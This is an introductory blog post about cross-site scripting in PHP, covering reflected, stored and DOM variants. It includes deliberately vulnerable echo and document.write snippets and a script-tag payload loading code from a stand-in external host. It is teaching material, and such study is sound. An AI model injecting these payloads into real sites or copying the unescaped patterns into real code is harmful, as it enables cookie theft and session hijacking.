What is Xss attack? (Php)

azibom

Mohammad Reza

Posted on April 18, 2020

What is Xss attack? (Php)

In this article i want to show you what is Xss attack

Cross-Site Scripting (XSS)

"XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it."
That is a very good definition that you can read more about it in owasp
But we are developers :) so let's look at it in the code

<?php
echo '<div>' . $_GET["title"] . '</div>';
echo '<div>' . $_GET["body"] . '</div>';
echo '<div>' . $_GET["footer"] . '</div>';
Enter fullscreen mode Exit fullscreen mode

For example if you have somethings like it in your code you are in danger of Xss attack.
for example consider someone send

<script src="http://xxx.com/xxx.js"></script>
Enter fullscreen mode Exit fullscreen mode

with get method, then you will serve sth like it in your page

<div><script src="http://xxx.com/xxx.js"></script></div>
Enter fullscreen mode Exit fullscreen mode

Oh ... so someone can run js in your page :/
Ok now let's look at the different kinds of Xss attacks to be more familiar with it

1.Reflected XSS

Reflected XSS means that the payload is reflected, i.e. the server reads it from the request and includes it as part of the response as well.

/search.php?q=hello would be an example that then shows up on the page.

<?php
    echo "You searched for " . $_GET["q"];
?>
Enter fullscreen mode Exit fullscreen mode

But really how can it hurt you :/
That is a useful list that can aware you

1.steal credentials in non-HTTPOnly cookies.

2.send requests to a server with the user's credentials. Think XSRF

3.steal secrets that are stored in JS variables.

4.prompt the user to download content by submitting a form

5.display text that seems to come from the site owners. Think phishing.

6.display a password input, log keystrokes, and send the result to a site of your choosing

7.redirect to another site

8.get GPS/camera data if the user has granted that site access to the device

Alt Text

2.Stored/Persistent XSS

If you find someways to store somethings like

<script src="http://xxx.com/xxx.js"></script>
Enter fullscreen mode Exit fullscreen mode

in database or somewhere that is persistent, you can call it Stored xss then you can do many things ... that means you have js file that run in special page every time :)

3.DOM XSS

let's look at this example

<script>
   document.write("<b>Current URL</b> : " + document.baseURI);
</script>
Enter fullscreen mode Exit fullscreen mode

if you send request like this

xxxxx.com/index.html#<script src="http://xxx.com/xxx.js"></script>
Enter fullscreen mode Exit fullscreen mode

your js code will be run
And for example if you send it to the others you can easily steal the cookies from the user's browser or change the behaviour of the page on the web application as you like :)

I hope you understand Xss attack and know the different types of it
If you have any questions feel free to ask them
Have a nice time

💖 💪 🙅 🚩
azibom
Mohammad Reza

Posted on April 18, 2020

Join Our Newsletter. No Spam, Only the good stuff.

Sign up to receive the latest update from our blog.

Related

What is Xss attack? (Php)
owasp What is Xss attack? (Php)

April 18, 2020